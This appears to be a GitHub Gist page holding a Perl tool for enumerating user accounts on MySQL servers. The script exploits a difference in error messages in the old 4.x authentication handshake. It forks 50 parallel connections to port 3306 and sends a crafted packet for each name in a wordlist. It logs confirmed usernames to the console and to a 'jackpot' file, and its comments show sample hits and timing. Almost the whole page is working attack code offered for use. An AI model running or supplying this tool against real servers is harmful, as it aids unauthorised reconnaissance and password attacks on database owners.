Created
December 2, 2012 01:06
-
-
Save fakessh/4186285 to your computer and use it in GitHub Desktop.
mysqluserenum.pl
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# MySQL User Account Enumeration Utility | |
# When an attacker authenticates using an incorrect password | |
# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server | |
# the mysql server will respond with a different message than Access Denied, what makes | |
# User Account Enumeration possible. | |
# The Downside is that the attacker has to reconnect for each user enumeration attempt | |
#20000 user accounts in 7 minutes | |
#Mon Jan 16 09:00:18 UTC 2012 | |
#Mon Jan 16 09:07:26 UTC 2012 | |
#root@vs2067037:~# wc -l MEDIUM.LST | |
#21109 MEDIUM.LST | |
#A usernames.txt wordlist is included in this package | |
#examples: | |
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt | |
# | |
#[*] HIT! -- USER EXISTS: administrator@host | |
# | |
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt | |
# | |
#[*] HIT! -- USER EXISTS: admin@host | |
# | |
use IO::Socket; | |
use Parallel::ForkManager; | |
$|=1; | |
if ($#ARGV != 1) { | |
print "Usage: mysqlenumerate.pl <target> <wordlist>\n"; | |
exit; | |
} | |
$target = $ARGV[0]; | |
$wordlist = $ARGV[1]; | |
$numforks = 50; | |
$pm = new Parallel::ForkManager($numforks); | |
open FILE,"<$wordlist"; | |
unlink '/tmp/cracked'; | |
@users = (); | |
$k=0; | |
while(<FILE>) { | |
chomp; | |
$_ =~ s/\r//g; | |
$users[$k++] = $_; | |
} | |
close FILE; | |
$k2 = 0; | |
for(;;) { | |
for ($k=0;$k<$numforks;$k++) { | |
$k2++; | |
if (($k2 > $#users) or (-e '/tmp/cracked')) { | |
exit; | |
} | |
my $pid = $pm->start and next; | |
$user = $users[$k2]; | |
goto further; | |
again: | |
print "Connect Error\n"; | |
further: | |
my $sock = IO::Socket::INET->new(PeerAddr => $target, | |
PeerPort => '3306', | |
Proto => 'tcp') || goto again; | |
recv($sock, $buff, 1024, 0); | |
$buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50". | |
"\x4e\x5f\x51\x55\x45\x4d\x45\x00"; | |
$buf = chr(length($buf)-3). $buf; | |
print $sock $buf; | |
$res = recv($sock, $buff, 1024, 0); | |
close($sock); | |
if ($k2 % 100 == 0) { | |
print $buff."\n"; | |
} | |
if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;} | |
unless (-e '/tmp/cracked') { | |
open FILE, ">/tmp/cracked"; | |
close FILE; | |
print "\n[*] HIT! -- USER EXISTS: $user\@$target\n"; | |
open FILE, ">jackpot"; | |
print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n"; | |
exit; | |
} | |
} | |
$pm->wait_all_children; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment